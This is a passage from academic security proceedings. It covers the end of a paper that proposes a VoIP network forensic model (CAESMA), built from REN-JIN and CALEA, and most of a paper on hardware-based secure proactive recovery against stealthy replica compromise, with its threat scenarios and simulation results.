The forensic network and Honeynet systems have the same data recollection function for system<br />

misuse. A Honeynet system lures attackers and gains information about new types of intrusions.<br />

Network forensic system analyzes and reconstructs the attack behavior. The integration of both<br />

systems will help to create an active self-learning and response system to capture the intrusion<br />

behavior and investigate the attack original source (Pelaez 2006).<br />

163


Figure 3: REN-JIN forensic model (Pelaez 2006)<br />

Jose Mas y Rubi et al.<br />

The Honeynets are highly controlled type of network architecture, one in which you can monitor all<br />

activity that occurs. By placing real victims (which can be any type of system, service or information)<br />

inside the network like an attack target, it creates an environment where you can observe everything<br />

that happens on it, allowing the attacking intruders interact with the Honeynet while information from<br />

that attack is being collected. This happens because Honeynets are high interaction real networks<br />

which implement traps to detect, deviate, or in some cases, to counteract non-authorize uses of the<br />

information system; where no service neither traffic is generated. Therefore, any interaction with the<br />

Honeynet implies malicious or non-authorize activities. Any connection initiated to a Honeynet implies<br />

that someone has compromised a system and has initiated a suspicious activity. This makes much<br />

easier the activity analysis, because all the captured information can be assumed as non-authorize or<br />

malicious one (Honeynet 2006).<br />

4. Comparative analysis<br />

One of the objectives of our work is to discuss the structure of REN-JIN and CALEA models, so that<br />

at the end, we could affirm if one of these models can be applicable for a VoIP traffic forensic<br />

analysis, and also proposing possible improvement to the selected model in this analysis process.<br />

The methodology to follow implies that the mentioned models are analyzed in the DFRWS general<br />

model structure, to identify if all the elements functions of each individual model meet the<br />

requirements of the chosen general model.<br />

In conclusion, the elements that integrate the forensic models CALEA and REN-JIN will be located in<br />

the corresponding step of the DFRWS model structure, to identify if the functions that those elements<br />

provide can cover one of the general model’s important steps.<br />

4.1 Discussion and analysis<br />

Table 2 shows the main function of each of the analyzed models, and then compared to the general<br />

model functions:<br />

4.2 REN-JIN and CALEA operation differences<br />

The main functions of CALEA are focused on a single component, LEA, which will depend on the<br />

traffic mirror used by the forensic agents to collect the required information. This makes the model<br />

easily adaptable to the rules governing the legal interception in the countries where these type of tools<br />

are used. However, it is the duty of each country to lay down rules for the use of this type of system,<br />

so the collected evidence could have full legality in the judicial environment.<br />

164


Jose Mas y Rubi et al.<br />

Table 2: Comparative analysis between REN-JIN and CALEA models<br />

In contrast, the main functions of REN-JIN are distributed between different components of the model,<br />

which are mainly controlled by the Network Forensic Server, which has autonomous power to<br />

determine what type of traffic should be captured and analyzed. This allow the tool to collect evidence<br />

in sequential steps, being able to obtain more precise and adequate information, regarding to the<br />

requirements of the judicial entities.<br />

Due to the characteristics of CALEA model, forensic investigators should have action freedom over<br />

the analyzed networks. However, because those networks can be public, there is a potential risk that<br />

interceptions could involve innocent users, violating their privacy rights.<br />

REN-JIN, as CALEA model, requires that forensic investigators have action freedom over the<br />

analyzed network. However, the traffic to be analyze is canalize to a Honeynet used by the model,<br />

preserving the privacy rights of all the user that are not involve in this study.<br />

It can be considered that CALEA performance is reactive, due to the fact that forensic investigators<br />

should identify the suspect and after it, they have to implement the analysis and capture platform<br />

proposed by the model.<br />

On the other hand, REN-JIN performance is also of the reactive type, but instead of previously identify<br />

the suspect, you need to identify the attacked network, which will become our decoy network<br />

(Honeynet), based in the analysis and capture platform proposed by the model.<br />

4.3 Model election<br />

Based on our analysis and after doing a balance between advantages and limitations of the two<br />

studied models, we observed that REN-JIN model has a more adequate architecture that possess the<br />

majority of the functions of the DFRWS general model, and when its limitations are overcome, this<br />

model can be validated as a network forensic model. Also, while REN-JIN is a theoretical model, we<br />

believe that it could be properly implemented.<br />

4.4 Improvements in the chosen model<br />

Considering REN-JIN as the chosen model, we observed that it presents several flaws, so we<br />

propose to correct them through the insertion of new elements that allow us to strengthen the<br />

architecture for a good VoIP forensic analysis.<br />

The identification function could be implemented in a convergence network through technologies like<br />

MEGACO H.248 protocol (ITU 2005) and ENUM (IETF 2004).<br />

165


Jose Mas y Rubi et al.<br />

The preservation function could be complemented with the deployment of a backup system like<br />

incremental backups and mirror system backups.<br />

The presentation function would be implemented with a report mechanism which contains the basic<br />

parameters that would allow to make an adequate legal analysis, and to use it as a proof and to<br />

possibly validate it as evidence. By modifying the REN-JIN model and introduce this new elements to<br />

it, a new forensic model is achieved, which we’ll call CAESMA model.<br />

5. Proposition of CAESMA model<br />

This proposition is an on-going investigation, so, in the following subsection we present a preliminary<br />

architecture and its basic operation.<br />

5.1 Presentation of the new architecture<br />

To be clear about the information flow between the elements that forms this network architecture, we<br />

present a basic diagram which is the following:<br />

Figure 4: Proposed network architecture<br />

By inserting an IP Multimedia Subsystem (IMS) module, this element will allow us to integrate various<br />

existing communication service platforms. Likewise, an ENUM module will allow us to link an<br />

identification number to a system user, having in mind that for each of the users may be various<br />

means of communication previously integrated to IMS. To make this user identification proposition<br />

viable is necessary that, for each of the services offered by the Service Provider, exists an appropriate<br />

registration in ENUM. For example:<br />

Figure 5: ENUM operation<br />

166


Jose Mas y Rubi et al.<br />

Another pending point in the improvement is the preservation function, and this can be improved<br />

through data duplication techniques like RAID disc structures, or by redundant servers; this<br />

modification must be implemented specifically in the Network Forensics Server, which can send the<br />

backup data to a medium describe above, after the data is previously analyzed.<br />

For the presentation function, the purpose of this element is to generate reports which will be<br />

presented to the competent authorities, for this is necessary to count with specialized personal that<br />

can adequately identify the proofs and validate them as possible evidences. For this purpose, we<br />

consider that an element that can fulfill this function is the Legal Enforcement Agency (LEA), which is<br />

a fundamental part of the CALEA model. Some of the basic parameters to be considered would be<br />

the ones presented in section II under the VoIP topic.<br />

5.2 Proposed network basic operation<br />

The operation of the network architecture and the relevant states for our analysis are appointed in the<br />

following lines:<br />

1) A call is generated from the Internet; it wants to communicate with some user on the network,<br />

for which it uses a number, for example, 4981791.<br />

2) Once the Gateway received the internet user communication petition, it will interact with the<br />

IMS core, which will interact at the same time with ENUM, and will return the user identification of<br />

the called number, according to SIP signaling.<br />

3) The CAESMA network will intercept the IMS core response and identify the affected user for<br />

the criminal acts which is being communicated.<br />

4) CAESMA will connect the capture network and starts the real time forensic process.<br />

5) The called user acts and proceeds with the communication normally.<br />

6) When the communication is finalized, the forensic process of recollecting proofs is also<br />

finished.<br />

Figure 6: Relevant states in CAESMA network operation<br />

6. Conclusions<br />

The current trend of widespread use of VoIP communications make indispensable to the forensic<br />

investigators to count with the necessary tools to study and prevent all the possible vulnerability<br />

threats in the communications.<br />

Possible applicable tools to this problematic issue, according to the investigation made in this paper,<br />

are the REN-JIN model and the CALEA model. Both were thought as network forensic models and<br />

are not fully adequate for evidence recollection in VoIP communications, due to the special<br />

parameters of the evidence, that allow the network forensic investigators to identify and capture<br />

specific data from the crime.<br />

167


Jose Mas y Rubi et al.<br />

In this sense, the new CAESMA model is proposed, which appears to cover the shortcomings noted<br />

in the forensic models previously mentioned, meeting all necessary steps for a proper VoIP forensic<br />

analysis, as established in the DFRWS general model.<br />

In conclusion, the CAESMA model offers a robust network forensic system for identification,<br />

preservation, collection, examination, analysis and presentation of the information concerning the<br />

VoIP traffic, which ultimately will provide us with validate evidence for an adequate use by judicial<br />

authorities.<br />

7. Future works<br />

Based in the comparative analysis completed in this work and the preliminary presentation of the<br />

CAESMA model, the next step in our work is to develop this new forensic model and its respective<br />

validation for an adequate VoIP network analysis.<br />

8. Annex 1<br />

Tree of trouble<br />

168


Tree of Objectives<br />

Acknowledgements<br />

Jose Mas y Rubi et al.<br />

To Juan C. Pelaez from U.S. Army Research Laboratory, USA, for his collaboration and for supply us<br />

with updated work material.<br />

To Juergen Rochol and Liane M. Rockenbach Tarouco from UFRGS, RS-Brazil, for their state of the<br />

art documentation.<br />

References<br />

DFRWS: Digital Forensics Research Workshop. (2001) "A Road Map for Digital Forensics Research 2001”.<br />

Digital Forensics Research Workshop 6 November. http://www.dfrws.org/2001/dfrws-rm-final.pdf<br />

IETF: Internet Engineering Task Force. (2004) “RFC 3761: The E.164 to URI DDDS Application (ENUM)”,<br />

http://www.ietf.org/rfc/rfc3761.txt<br />

ITU: International Telecommunication Union, (2005) “Recommendation H.248.1”, http://www.itu.int/rec/T-REC-<br />

H.248.1-200509-I/en<br />

Fernandez, Eduardo; Pelaez, Juan and Larrondo-Petrie, Maria. (2007) “Security patterns for Voice over IP<br />

Networks”, Journal of Software, Vol. 2, No. 2, August.<br />

169


Jose Mas y Rubi et al.<br />

Moore, T.; Meehan, A.; Manes, G. and Shenoi, S. (2005) “Using Signaling Information in Telecom Network<br />

forensics”. Advances in Digital Forensics: IFIP International <strong>Conference</strong> on Digital Forensics, National<br />

Center for Forensic Science, Orlando, Florida, USA.<br />

Pelaez, Juan and Fernandez, Eduardo. (2006) “Wireless VOIP Network Forensics”, Fourth LACCEI International<br />

Latin American and Caribbean <strong>Conference</strong> for Engineering and Technology (LACCET’2006), Mayaguez,<br />

Puerto Rico.<br />

Pelaez, Juan; Fernandez, Eduardo; Larrondo-Petrie, Maria and Wieser, Christian. (2007) “Attack Patterns in<br />

VoIP”, Florida Atlantic University, USA. University of Oulu, USA.<br />

Pelaez, Juan and Fernandez, Eduardo. (2010) “VoIP Network Forensic Patterns”, U.S. Army Research<br />

Laboratory, USA. Florida Atlantic University, USA.<br />

Ray, Daniel and Bradford, Phillip. (2007) “Models of Models: Digital Forensics and Domain-Specific Languages”,<br />

Department of Computer Science, The University of Alabama, USA.<br />

Reith, Mark; Carr, Clint and Gunsch, Gregg. (2002) “An Examination of Digital Forensic Models”, International<br />

Journal of Digital Evidence, Fall, Volume 1, Issue 3.<br />

Scoggins, Sophia. (2004) “Security Challenges for CALEA in Voice over Packet Networks”. Texas Instruments,<br />

April 16, USA.<br />

The Honeynet Project. (2006) “Know Your Enemy: Honeynets”, http://www.honeynet.org<br />

170


Secure Proactive Recovery – a Hardware Based Mission<br />

Assurance Scheme<br />

Ruchika Mehresh 1 , Shambhu Upadhyaya 1 and Kevin Kwiat 2<br />

1<br />

State University of New York at Buffalo, USA<br />

2<br />

Air Force Research Laboratory, Rome, USA<br />

rmehresh@buffalo.edu<br />

shambhu@buffalo.edu<br />

kwiatk@rl.af.mil<br />

Abstract: Mission Assurance in critical systems entails both fault tolerance and security. Since fault tolerance via<br />

redundancy or replication is contradictory to the notion of a limited trusted computing base, normal security<br />

techniques cannot be applied to fault tolerant systems. Thus, in order to enhance the dependability of mission<br />

critical systems, designers employ a multi-phase approach that includes fault/threat avoidance/prevention,<br />

detection and recovery. Detection phase is the fallback plan for avoidance/prevention phase, as recovery phase<br />

is the fallback plan for detection phase. However, despite this three-stage barrier, a determined adversary can<br />

still defeat system security by staging an attack on the recovery phase. Recovery being the final stage of the<br />

dependability life-cycle, unless certain security methodologies are used, full assurance to mission critical<br />

operations cannot be guaranteed. For this reason, we propose a new methodology, viz. secure proactive<br />

recovery that can be built into future mission-critical systems in order to secure the recovery phase at low cost.<br />

The solution proposed is realized through a hardware-supported design of a consensus protocol. One of the<br />

major strengths of this scheme is that it not only detects abnormal behavior due to system faults or attacks, but<br />

also secures the system in case where a smart attacker attempts to camouflage by playing along with the<br />

predefined protocols. This sort of adversary may compromise certain system nodes at some earlier stage but<br />

remain dormant until the critical phase of the mission is reached. We call such an adversary The Quiet Invader.<br />

In an effort to minimize overhead, enhance performance and tamper-proof our scheme, we employ redundant<br />

hardware typically found in today’s self-testing processor ICs, like design for testability (DFT) and built-in self-test<br />

(BIST) logic. The cost and performance analysis presented in this paper validates the feasibility and efficiency of<br />

our solution.<br />

Keywords: security, fault tolerance, mission assurance, critical systems, hardware<br />

1. Introduction<br />

Research in the past several decades has seen significant maturity in the field of fault tolerance. But,<br />

fault tolerant systems still require multi-phased security due to the lack of a strong trusted computing<br />

base. The first phase in this regard is avoidance/prevention, which consists of proactive measures to<br />

reduce the probability of any faults or attacks. This can be achieved via advanced design<br />

methodologies like encryption. The second phase, detection, primarily consisting of an intrusion<br />

detection system attempts to detect the faults and malicious attacks that occur despite the preventive<br />

measures. The final phase is the recovery that focuses on recuperating the system after the<br />

occurrence of attack/fault. Generally, fault tolerant systems rely on replication and redundancy for<br />

fault-masking and system recovery.<br />

These three layers of security provide a strong defense for mission critical systems. Yet, if a<br />

determined adversary stages an attack on the recovery phase of an application, it is quite possible<br />

that the mission will fail due to the lack of any further countermeasures. Therefore, these systems<br />

need the provisioning of another layer of defense to address attacks that may be brought about by<br />

malicious opponents during the recovery phase itself.<br />

The quiet invader is another serious threat that we consider. Attacking the mission in its critical phase<br />

not only leaves the defender with less time to respond, but cancelling the mission at this late stage is<br />

far more expensive than cancelling it at some earlier stage. In the case where the defender is not left<br />

with enough time to respond to the attack, it can lead to major economic loss and even fatalities.<br />

We develop a framework for mission assured recovery using the concept of runtime node-to-node<br />

verification implementable at low-level hardware that is not accessible by the adversary. The rationale<br />

behind this approach is that if an adversary can compromise a node by gaining root privilege to userspace<br />

components, any solution developed in the user space will not be effective since such solutions<br />

may not remain secure and tamper-resistant. In our scheme, the entire verification process can be<br />

carried out in a manner that is oblivious to the adversary, which gains the system an additional<br />

171


Ruchika Mehresh et al.<br />

advantage. We explore the potential of utilizing the test logic on the processors (and hence the name<br />

“hardware-based mission assurance scheme”) for implementing our secure proactive recovery<br />

paradigm. This choice makes our solution extremely cost effective. In order to establish the proof-ofconcept<br />

for this proposal, we will consider a simple mission critical system architecture that uses<br />

majority consensus for diagnosis and recovery. Finally, we analyze the security, usability and<br />

performance overhead for this scheme.<br />

2. Related work<br />

The solutions proposed in the literature to address faults/attacks in fault tolerant systems are<br />

designed to employ redundancy, replication and consensus protocols. They are able to tolerate the<br />

failure of up to f replicas. However, given enough time and resources, an attacker can compromise<br />

more than f replicas and subvert the system. A combination of reactive and proactive recovery<br />

approaches can be used to keep the number of compromised replicas under f at all times (Sousa et<br />

al. 2007). However, as the attacks become more complex, it becomes harder to detect any faulty or<br />

malicious behavior (Wagner and Soto 2002). Moreover, if one replica is compromised, the adversary<br />

holds the key to other replicas too. To counter this problem, researchers have proposed spatial<br />

diversity in software. Spatial diversity can slow down an adversary but eventually the compromise of<br />

all diverse replicas is possible. Therefore, it was further proposed to introduce time diversity along<br />

with the spatial diversity. Time diversity modifies the state of the recovered system (OS access<br />

passwords, open ports, authentication methods, etc.). This is to assure that an attacker is unable to<br />

exploit the same vulnerabilities that he had exploited before (Bessani et al. 2008).<br />

3. Threat model<br />

We developed an extensive threat model to analyze security logically in a wide range of scenarios.<br />

Assume that we have n replicas in a mission-critical application and the system can tolerate the failure<br />

of up to f replicas during the entire mission.<br />

Scenario 1: Attacks on Byzantine fault-tolerant protocols<br />

Assume that no design diversity is introduced in a replicated system. During the mission lifetime, an<br />

adversary can easily compromise f+1 identical replicas and bring down the system.<br />

Scenario 2: Attacks on proactive recovery protocols<br />

In proactive recovery, the whole system is rejuvenated periodically. However, the adversary becomes<br />

more and more knowledgeable as his attacks evolve with each succeeded/failed attempt. So it is only<br />

a matter of time before he is able to compromise f+1 replicas between periodic rejuvenations.<br />

Furthermore, the compromised replicas can disrupt the system’s normal functioning in many ways like<br />

creating extra traffic so the recovery is delayed and the adversary gains more time to compromise f+1<br />

replicas (Sousa et al. 2007).This is a classic case of attacking the recovery phase.<br />

Scenario 3: Attacks on proactive-reactive recovery protocols<br />

Proactive-reactive recovery solves several major problems, except that if the compromised node is<br />

recovered by restoring the same state that was previously attacked, the attacker will already know the<br />

vulnerabilities (Sousa et al. 2007). In this case, a persistent attacker may get faster with time, or may<br />

invoke many reactive recoveries exhausting the system resources. Large number of recoveries also<br />

affects the system availability adversely. This is also an instance of attacking the recovery phase.<br />

Furthermore, arbitrary faults are very difficult to detect (Haeberlen et al. 2006).<br />

Scenario 4: Attacks on proactive-reactive recovery with spatial diversity<br />

Spatial diversity in replicas is proposed to be a relatively stronger security solution. It can be difficult<br />

and more time-consuming for the adversary to compromise f+1 diverse replicas but it is possible to<br />

compromise these diverse replicas eventually, especially for long running applications. Also, most of<br />

the existing systems are not spatially diverse. Introducing spatial diversity into the existing systems is<br />

expensive.<br />

Time diversity has been suggested to complement the spatial diversity so as to make it almost<br />

impossible to predict the new state of the system (Bessani et al. 2008). The complexity involved in<br />

172


Ruchika Mehresh et al.<br />

implementing time diversity in a workable solution is very high because it will have to deal with on-thefly<br />

compatibility issues and much more. Besides, updating replicas and other communication<br />

protocols consume considerable time and resources. A decent workable solution employing space<br />

diversity still needs a lot of work (Banatre et al. 2007), so employing time diversity is a step planned<br />

too far into the future.<br />

Scenario 5: The quiet invader<br />

In the presence/absence of spatial diversity, an adversary may be able to investigate a few selected<br />

nodes quietly and play along with the protocol to avoid getting caught and gain more time to<br />

understand the system. After gathering enough information, the adversary can design attacks for f+1<br />

replicas and launch the attacks on all of them at once when he is ready or when the mission enters a<br />

critical stage. If these attacks are not detected or dealt with in time, the system fails. This is an<br />

evasive attack strategy for subverting the detection and recovery phases. Similar threat models have<br />

been discussed in literature previously (Todd et al. 2007, Del Carlo 2003).<br />

Scenario 6: The physical access threat<br />

Sometimes system nodes are deployed in an environment where physical access to them is a highly<br />

probable threat. For instance, in the case of wireless sensor network deployment, sensor nodes are<br />

highly susceptible to physical capture. To prevent such attacks, we need to capture any changes in<br />

the physical environment of a node. A reasonable solution may involve attaching motion sensors to<br />

each node. Any unexpected readings from these motion sensors will indicate a possible threat and<br />

then our scheme can be used to assure the mission.<br />

4. System design<br />

4.1 Assumptions<br />

We work with a simplified, centralized architecture of a mission critical application in order to describe<br />

and evaluate the proposed scheme. No spatial or time diversity is assumed, though our scheme will<br />

work with any kind of diversity.<br />

The network can lose, duplicate or reorder messages but is immune to partitioning. The coordinator<br />

(central authority and trusted computing base) is responsible for periodic checkpointing in order to<br />

maintain a consistent global state. The stable storage at coordinator holds the recovery data through<br />

all the tolerated failures and their corresponding recoveries. We assume sequential and equidistant<br />

checkpointing (Elnozahy et al. 2002).<br />

The replicas are assumed to be running on identical hardware platforms. Each node has advanced<br />

CPU (Central processing unit) and memory subsystems along with the test logic (in the form of DFT<br />

and BIST) that is generally used for manufacture test. Refer to Fig. 1(a). All the chips comply with the<br />

IEEE 1149.1 JTAG standard (Abramovici and Stroud 2001). Fig. 1(b) elaborates the test logic and<br />

boundary scan cells corresponding to the assumed hardware.<br />

We assume a software tripwire running on each replica that can be used to detect a variety of<br />

anomalies at the host. By instrumenting the openly available tripwire source code (Hrivnak 2002), we<br />

can direct the "intrusion alert/alarm" to a set of system registers (using low level coding).The triggered<br />

and latched hardware signature will be read out by taking a snapshot of the system registers using<br />

the “scan-out” mode of the observation logic associated with the DFT hardware. The bit pattern will be<br />

brought out to the CPU ports using the IEEE 1149.1 JTAG instruction set in a tamper-resistant<br />

manner. Once it is brought out of the chip, it will be securely sent to the coordinator for verification and<br />

further action. This way, the system will be able to surreptitiously diagnose the adversary’s action.<br />

4.2 Conceptual basics<br />

We present a simple and practical alternative to the spatial/time diversity solutions in order to increase<br />

the resilience of a fault tolerant system against benign faults and malicious attacks. In particular, this<br />

is to address the threat of a quiet invader (Scenario 5 of Section 3). An adversary needs to<br />

compromise f+1 replicas out of the n correctly working replicas in order to affect the result of a<br />

majority consensus protocol and disrupt the mission.<br />

173


Figure 1(a): Replicated hardware<br />

Figure 1(b): Capturing signature<br />

Ruchika Mehresh et al.<br />

The key idea is to detect a system compromise by a smart adversary who has taken over some<br />

replicas (or has gained sufficient information about them) but is playing along in order to gain more<br />

time. From the defender’s point of view, if the system knows which of the n replicas have become<br />

untrustworthy, the mission can still succeed with the help of the surviving healthy replicas. Smart<br />

attackers try to minimize the risk of getting caught by compromising only the minimum number of<br />

replicas required in order to subvert the entire system. Aggressive attackers can be clearly and easily<br />

detected and thus their attacks can be recovered from. So a smart defender should be able to detect<br />

the attacks surreptitiously so as not to make the attacker aggressive. This especially holds for the<br />

cases when a smart attacker has been hiding for long and the mission is nearing completion. At this<br />

stage, the priority is not to identify the attacker but to complete the mission securely.<br />

The proposed scheme offers a passive detection and recovery, in order to assure the adversary of its<br />

apparent success to prevent him from getting more aggressive. At some later stage, when the<br />

adversary launches an attack to fail f+1 replicas at once, the attack fails because those replicas have<br />

already been identified and ousted from the voting process without the knowledge of the attacker. In<br />

our solution, we require that there should be at least two correctly working replicas to provide a duplex<br />

system at a minimum, for the mission to succeed. The advantage of this approach is that in the worst<br />

case where all the replicas are compromised, the system will not deliver a result, rather than<br />

delivering a wrong one. This is a necessary condition for many safety-critical missions. If an adversary<br />

can compromise a replica by gaining root privilege to user-space components, one should note that<br />

any solution developed in the user space will not be effective since such solutions will not remain<br />

secure and tamper-resistant. Therefore, our paradigm achieves detection of node compromise<br />

through a verification scheme implementable in low-level hardware. We use software or hardwaredriven<br />

tripwires that would help detect any ongoing suspicious activity and trigger a hardware<br />

signature that indicates the integrity status of a replica. This signature is generated without affecting<br />

the application layer, and hence the attacker remains oblivious of this activity. Also, a smart attacker is<br />

not likely to monitor the system thoroughly as that may lead to detection. This signature is then<br />

securely collected and sent to the coordinator that performs the necessary action.<br />

4.3 Checkpointing<br />

In our simplified application, the checkpointing module that affiliates to the coordinator establishes a<br />

consistent global checkpoint and also carries out voting procedures that lead to anomaly detection<br />

due to faults, attacks or both.<br />

174


Ruchika Mehresh et al.<br />

The coordinator starts the checkpointing/voting process by broadcasting a request message to all the<br />

replicas, asking them to take checkpoints. It also initiates a local timer that runs out if the coordinator<br />

does not receive the expected number of replies within a specific time frame. On receiving this<br />

message, all the replicas pause their respective executions and take a checkpoint. These checkpoints<br />

are then sent over the network to the coordinator through a secure channel using encryption. On<br />

receiving the expected number of checkpoints, coordinator compares them for consistency. If all<br />

checkpoints are consistent, it broadcasts a commit message that completes the two-phase checkpoint<br />

protocol. After receiving the commit message, all the replicas resume their respective executions. This<br />

is how the replicas execute in lockstep. In case the timer runs out before the expected number of<br />

checkpoints are received at the coordinator, it sends out another request message. All the replicas<br />

send their last locally stored checkpoints as a reply to this request message. In our application, we<br />

have limited the number of repeated checkpoint requests to three per non-replying replica. If a replica<br />

does not reply to three (or a threshold count) checkpoint request messages, it is considered dead by<br />

the coordinator and a commit message is sent to the rest of the replicas if their checkpoints are<br />

consistent. In case that the checkpoints are not consistent, the coordinator replies with a rollback<br />

message to all the replicas. This rollback message includes the last consistent checkpoint that was<br />

stored on the stable storage at the coordinator. All the replicas then return to the previous state of<br />

execution as defined by the rollback message. If a certain replica fails to deliver consistent checkpoint<br />

and causes more than three (or a threshold count) consecutive rollbacks, the fault is considered<br />

permanent and the replica is excluded from the system.<br />

A hardware signature is generated at each replica and piggybacked on the checkpoint when it is sent<br />

to the coordinator. This signature quantifies the integrity status of the replica since the last successful<br />

checkpoint. For simplicity, we use the values – all-0s (for an uncompromised replica) and all-1s (for a<br />

compromised replica). A host-based intrusion detection sensor at all the replicas is responsible for<br />

generating these signatures. If the coordinator finds any hardware signature to be all-1s, then the<br />

corresponding replica is blacklisted and any of its future results/checkpoints are ignored at the<br />

coordinator. However, the coordinator continues normal communication with the blacklisted replica to<br />

keep the attacker unaware of this discovery.<br />

Finally, all the results from each of the non-blacklisted replicas will be voted upon by the coordinator<br />

for the final result.<br />

4.4 Using built-in test logic for hardware signature generation and propagation<br />

As described under assumptions, the system uses a software-driven trip-wire that monitors the<br />

system continuously for a specified range of anomalies. Tripwire raises an alarm on anomaly<br />

detection by setting the value of a designated system register to all-1s (it will be all-0s otherwise). This<br />

value then becomes the integrity status indicator for the replica and is read out using the scan-out<br />

mode of the test logic. It is then securely sent to the coordinator for verification.<br />

5. Performance analysis<br />

Most of the mission critical military applications that employ checkpointing or proactive security tend to<br />

be long running ones. For instance, a rocket launch countdown running for hours/days. Therefore, our<br />

performance analysis will focus on long running applications and their overall execution time.<br />

Since our scheme employs built-in hardware for implementing security, and security-related<br />

notifications piggyback the checkpointing messages, our security comes nearly free for systems that<br />

already use checkpointing for fault tolerance. However, many legacy systems that do not use any<br />

checkpointing will need to employ checkpointing before they can benefit from our scheme. In such<br />

cases, cost of checkpointing is also included in the cost of employing our security scheme. To cover<br />

all these possibilities, we consider the following three cases.<br />

Case 1: This case includes all the mission critical legacy systems that do not employ checkpointing or<br />

security.<br />

Case 2: This case examines mission critical systems that employ checkpointing as a safety measure<br />

in the absence of any failures or attacks. Note that this will be the worst case scenario for Case 1<br />

systems that may adopt our scheme because there are practically no faults/attacks. Also, our security<br />

scheme is nearly free for Case 2 systems, if they choose to employ it.<br />

175


Ruchika Mehresh et al.<br />

Case 3: The systems considered under Case 3 employ checkpointing and our proposed security<br />

scheme (hardware signature verification). This case considers the occurrence of failures and securityrelated<br />

attacks.<br />

These three cases allow us to study the cost of adopting our security scheme in all possible<br />

scenarios.<br />

Since the proposed system is composed of both hardware and software subsystems, we could not<br />

use one standard simulation engine to simulate the entire application accurately and obtain data.<br />

Therefore, we combined the results obtained from individually simulating the software and the<br />

hardware components using our multi-step simulation approach (Mehresh et al. 2010).<br />

5.1 Simplified system prototype development<br />

Figure 2 shows the modular design of the simplified system for mission critical applications with n<br />

replicas. The coordinator is the core of this centralized replicated system. It is responsible for voting<br />

operations on intermediate results, integrity signatures and checkpoints obtained from the replicas.<br />

The heartbeat manager broadcasts periodic ping messages to determine if the nodes are alive. The<br />

replicas are identical copies of the workload executing in parallel in lockstep.<br />

Figure 2: Overall system design<br />

5.2 Multi-step simulation approach<br />

We use a multi-step simulation approach to evaluate the system performance for the three cases.<br />

This new approach is required because there are currently no benchmarks for evaluating such<br />

systems. A combination of pilot system implementation and simulation is used to obtain more realistic<br />

and statistically accurate results.<br />

Different components of this evaluation include a JAVA implementation based on Chameleon<br />

ARMORs (Kalbarczyk et al. 1999), ARENA simulation (http://www.arenasimulation.com/) and<br />

CADENCE simulation (http://www.cadence.com). ARENA simulation is discrete event and it simulates<br />

the given system at a high level of abstraction. The lower levels of abstraction that become too<br />

complex to model are parameterized using the data obtained from conducting experiments with the<br />

JAVA system prototype. Another reason for using ARENA simulator is the analysis of long running<br />

mission critical applications. Such an analysis with real-time experiments is not efficient and extremely<br />

time consuming. The Java prototype consists of socket programming across a network of 100 Mbps<br />

bandwidth. The experiments for measuring performance were conducted on Windows platform with<br />

an Intel Core Duo 2 GHz processor and 2 GB RAM. CADENCE simulation is primarily used for the<br />

feasibility study of the proposed hardware scheme. To verify the precision of our simulators, test<br />

cases were developed and deployed for the known cases of operation.<br />

This system accepts workloads from the user and executes them in a fault tolerant environment. We<br />

used the Java SciMark 2.0 workloads as user inputs in this system prototype. The four workloads that<br />

we used are: Fast Fourier Transform (FFT), Jacobi Successive Over-relaxation (SOR), Sparse Matrix<br />

176


Ruchika Mehresh et al.<br />

multiplication (Sparse) and Dense LU matrix Factorization (LU). The standard large data sets<br />

(http://math.nist.gov/scimark2) were used.<br />

Data-sets from short running replicated experiments were collected and fitted probability distributions<br />

were obtained using ARENA input data analyzer. These distributions defined the stochastic<br />

parameters for ARENA simulation model.<br />

We examine the feasibility of the hardware component of this architecture (as described under<br />

assumptions) as follows. The integrity signature of a replica is stored in the flip flops of the boundary<br />

scan chain around a processor. This part of our simulation is centered on a boundary scan inserted<br />

DLX processor (Patterson and Hennessy 1994). Verilog code for the boundary scan inserted DLX<br />

processor is elaborated in cadence RTL compiler. To load the signature into these scan cells<br />

a multiplexer is inserted before each cell, which has one of the inputs as test data input (TDI) and the<br />

other from the 32 bit signature vector. Depending on the select line either the test data or the<br />

signature is latched into the flip flops of the scan cells. To read the signature out the bits are serially<br />

shifted from the flip flops onto the output bus.<br />

5.3 Results<br />

We analyze the prototype system for the three cases described earlier. Since we want to evaluate the<br />

performance of this system in the worst case scenario where the checkpointing overhead is<br />

maximum, we choose sequential checkpointing (Elnozahy et al. 2002). For the following analysis<br />

(unless mentioned), checkpoint interval is assumed to be 1 hour. Table 1 presents the execution<br />

times for the four Scimark workloads. The values from Table 1 are plotted in Figure 3 on a logarithmic<br />

scale. We can see that the execution time overhead increases a little when the system shifts from<br />

Case 1 to Case 2 (i.e., employing our scheme as a preventive measure). However, the execution time<br />

overhead increases rapidly when the system moves from Case 2 and Case 3. The execution<br />

overhead will only increase substantially if there are too many faults present, in which case it would be<br />

worth the fault tolerance and security that comes along. As we can see from the values of Table 1, an<br />

application that runs for 13.6562 hours will incur an execution time overhead of only 13.49 minutes in<br />

moving from Case 1 to Case 2.<br />

Figure 3: Execution times for Scimark workloads across three cases, on a logarithmic scale<br />

Figure 4 shows the percentage increase in execution times of various workloads when the system<br />

upgrades from a lower case to a higher one. It is assumed that these workload executions do not<br />

have any interactions (inputs/outputs) with the external environment. The percentage increase in<br />

execution times of all the workloads when the system upgrades from Case 1 to Case 2 is only around<br />

1.6%. An upgrade from Case 1 to Case 3 (with mean time to fault, M =10) is around 9%. These<br />

percentages indicate acceptable overheads.<br />

177


Ruchika Mehresh et al.<br />

Table 1: Execution times (in hours) for the Scimark workloads across three cases<br />

Case 1<br />

Case 2<br />

Case 3 (M=10)<br />

Case 3 (M=25)<br />

FFT LU SOR Sparse<br />

3421.09 222.69 13.6562 23.9479<br />

3477.46 226.36 13.8811 24.3426<br />

3824.63 249.08 15.2026 26.7313<br />

3593.39 233.83 13.8811 24.3426<br />

Figure 4: Percentage execution time overheads incurred by the Scimark workloads while shifting<br />

between cases<br />

As Table 1 shows, for a checkpoint interval of 1 hour and M =10, the workload LU executes for<br />

approximately 10 days. Figure 5 shows the effect of increasing checkpoint interval for workload LU for<br />

different values of M ranging from 5 to 25. The optimal checkpoint interval values (and the<br />

corresponding execution times) for the graph plots in Figure 5 are provided in Table 2.<br />

Figure 5: Effect of checkpoint interval on workload execution times at different values of M<br />

Note that we used the multi-step approach for this simulation and the parameters for the simulation<br />

model were derived from experimentation. Therefore, these results do not just represent the data<br />

trends but are also close to the statistically expected real-world values.<br />

178


Ruchika Mehresh et al.<br />

Table 2: Approximate optimal checkpoint interval values and their corresponding workload execution<br />

times for LU (Case 3) at different values of M<br />

6. Conclusion<br />

Optimal Checkpoint Interval (hours)<br />

Execution Times(hours)<br />

